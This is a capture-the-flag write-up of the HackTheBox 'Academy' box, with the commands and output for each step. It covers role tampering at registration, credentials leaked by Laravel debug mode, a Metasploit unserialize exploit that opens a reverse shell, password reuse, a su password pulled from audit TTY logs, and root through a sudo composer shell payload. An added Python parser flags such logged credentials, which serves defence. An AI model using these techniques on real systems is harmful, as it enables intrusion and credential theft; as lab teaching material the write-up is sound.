HackTheBox - Academy write up

Academy is an Easy Linux box released on 7 November 2020.


Port scan:

$ nmap -A -p -1024 -oN scan.nmap

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 3072 c0:90:a3:d8:35:25:6f:fa:33:06:cf:80:13:a0:a5:53 (RSA)
| 256 2a:d5:4b:d0:46:f0:ed:c9:3c:8d:f6:5d:ab:ae:77:96 (ECDSA)
|_ 256 e1:64:14:c3:cc:51:b2:3b:a6:28:a7:b1:ae:5f:45:35 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Hack The Box Academy
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Only SSH on port 22 and an Apache web server on port 80 are open.


Here is the Apache web page:


I intercepted the request sent when registering a user.

We can see the username and password, but what is the roleid variable? If you change it to 1, you can create an admin user :)

While I was looking at the website, gobuster found several pages:

/index.php            (Status: 200) [Size: 2117]
/login.php            (Status: 200) [Size: 2627]
/register.php         (Status: 200) [Size: 3003]
/images               (Status: 301) [Size: 311] [--> http://academy.htb/images/]
/admin.php            (Status: 200) [Size: 2633]
/home.php             (Status: 302) [Size: 55034] [--> login.php]
/config.php           (Status: 200) [Size: 0]
/server-status        (Status: 403) [Size: 276]

Let's go to admin.php and log in with our admin user named toto. It works! Now we have this todo list:

We can see that the last issue is still pending. Let's add the virtual host to /etc/hosts:

academy.htb dev-staging-01.academy.htb

Let’s visit dev-staging-01.academy.htb.

This is a Laravel (PHP framework) app. Thanks to the debug mode being enabled, we can retrieve some environment variables:

APP_NAME  "Laravel"
APP_KEY   "base64:dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
APP_DEBUG   "true"
DB_HOST   ""
DB_PORT   "3306"
DB_DATABASE   "homestead"
DB_USERNAME   "homestead"
DB_PASSWORD   "secret"

User #1

After some research, we can find a Laravel exploit in Metasploit.

msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options
Module options (exploit/unix/http/laravel_token_unserialize_exec):
   Name       Current Setting                               Required
   APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no
   Proxies                                                  no
   RHOSTS                                  yes
   RPORT      80                                            yes
   SSL        false                                         no
   TARGETURI  /                                             yes
   VHOST      dev-staging-01.academy.htb                    no
msf6 exploit(unix/http/laravel_token_unserialize_exec) > run
[*] Started reverse TCP handler on 
[*] Command shell session 2 opened ( -> at 2020-12-22 18:49:42 +0100
[*] Trying to find binary(python) on target machine
[*] Trying to find binary(python3) on target machine
[*] Found python3 at /usr/bin/python3
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary(bash) on target machine
[*] Found bash at /usr/bin/bash
uid=33(www-data) gid=33(www-data) groups=33(www-data)

We have a shell!

User #2

Time to privesc (privilege escalation)!

I found some passwords in the application source code, but they were not useful. Then I found this environment file:

www-data@academy:/var/www/html/academy$ cat .env

This password was reused by one of the users.

www-data@academy:/home$ su cry0l1t3
Password: mySup3rP4s5w0rd!!
$ bash

Our user is in the adm group, so we can read all the log files in /var/log. Let's look for some passwords:

$ id
uid=1002(cry0l1t3) gid=1002(cry0l1t3) groups=1002(cry0l1t3),4(adm)
$ grep -RE 'comm="su"|comm="sudo"' /var/log/ 2>/dev/null
/var/log/audit/audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A
$ aureport --tty
1. 08/12/2020 02:28:10 83 0 ? 1 sh "su mrb3n",<nl>
2. 08/12/2020 02:28:13 84 0 ? 1 su "mrb3n_Ac@d3my!",<nl>
Notes:
1) unhex(6D7262336E5F41634064336D79210A) = mrb3n_Ac@d3my!
2) aureport is a tool that produces summary reports of audit daemon logs; --tty reports on tty keystrokes.

We got mrb3n's password!
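As an added example (not part of the original write-up), here is a small Python parser for the kind of audit TTY record shown above: it decodes the hex data field and flags records where a credential-handling command such as su or sudo had its keystrokes logged, which is exactly the exposure a defender reviewing TTY auditing wants to catch. The first sample line is the page's own audit record; the other lines are constructed.

```python
import re
from typing import Dict, List, Optional

# Fields of interest in a TTY audit record (auditd "type=TTY" line).
TTY_RE = re.compile(
    r'type=TTY\s+msg=audit\((?P<ts>\d+\.\d+):(?P<serial>\d+)\):.*?'
    r'\buid=(?P<uid>\d+).*?\bcomm="(?P<comm>[^"]*)".*?\bdata=(?P<data>[0-9A-Fa-f]+)'
)

# Commands whose TTY input usually contains a credential.
SENSITIVE_COMMS = {"su", "sudo", "passwd", "ssh", "mysql"}

# Constructed sample: line 2 is the record from the page, the rest are made up.
SAMPLE_RECORDS = [
    '/var/log/audit/audit.log.3:type=TTY msg=audit(1597199293.906:83): tty pid=2519 '
    'uid=1002 auid=0 ses=1 major=4 minor=1 comm="sh" data=7375206D7262336E0A',
    '/var/log/audit/audit.log.3:type=TTY msg=audit(1597199293.906:84): tty pid=2520 '
    'uid=1002 auid=0 ses=1 major=4 minor=1 comm="su" data=6D7262336E5F41634064336D79210A',
    'type=TTY msg=audit(1597199300.123:85): tty pid=2530 uid=1002 auid=0 ses=1 '
    'major=4 minor=1 comm="bash" data=6C73202D6C610A',
    'type=SYSCALL msg=audit(1597199300.124:86): arch=c000003e syscall=59 success=yes',
]


def parse_tty_record(line: str) -> Optional[Dict[str, str]]:
    """Return the parsed fields of a TTY record, with data decoded from hex, or None."""
    m = TTY_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["text"] = bytes.fromhex(rec["data"]).decode("utf-8", errors="replace")
    return rec


def find_credential_exposures(lines: List[str]) -> List[Dict[str, str]]:
    """Keep only TTY records whose keystrokes were typed into a sensitive command."""
    hits = []
    for line in lines:
        rec = parse_tty_record(line)
        if rec and rec["comm"] in SENSITIVE_COMMS:
            hits.append(rec)
    return hits


def summarize(hits: List[Dict[str, str]]) -> List[str]:
    """Redacted report lines: record that a credential was captured without copying it."""
    out = []
    for h in hits:
        captured = h["text"].rstrip("\n")
        out.append(f'serial={h["serial"]} uid={h["uid"]} comm={h["comm"]} '
                   f'captured={len(captured)} chars ({"*" * len(captured)})')
    return out


if __name__ == "__main__":
    for line in summarize(find_credential_exposures(SAMPLE_RECORDS)):
        print(line)
```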


Time to get root!

mrb3n@academy:/dev/shm$ sudo -l
[sudo] password for mrb3n: mrb3n_Ac@d3my!
Matching Defaults entries for mrb3n on academy:
    env_reset, mail_badpass,
User mrb3n may run the following commands on academy:
    (ALL) /usr/bin/composer

Thanks to GTFOBins, we know how to run shell commands through composer. Since we can run composer with sudo, we can run shell commands as root :)

mrb3n@academy:/dev/shm$ TF=$(mktemp -d)
mrb3n@academy:/dev/shm$ echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
mrb3n@academy:/dev/shm$ sudo composer --working-dir=$TF run-script x
PHP Warning:  PHP Startup: Unable to load dynamic library 'mysqli.so' (tried: /usr/lib/php/20190902/mysqli.so (/usr/lib/php/20190902/mysqli.so: undefined symbol: mysqlnd_global_stats), /usr/lib/php/20190902/mysqli.so.so (/usr/lib/php/20190902/mysqli.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
PHP Warning:  PHP Startup: Unable to load dynamic library 'pdo_mysql.so' (tried: /usr/lib/php/20190902/pdo_mysql.so (/usr/lib/php/20190902/pdo_mysql.so: undefined symbol: mysqlnd_allocator), /usr/lib/php/20190902/pdo_mysql.so.so (/usr/lib/php/20190902/pdo_mysql.so.so: cannot open shared object file: No such file or directory)) in Unknown on line 0
Do not run Composer as root/super user! See https://getcomposer.org/root for details
> /bin/sh -i 0<&3 1>&3 2>&3
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt

Rooted!
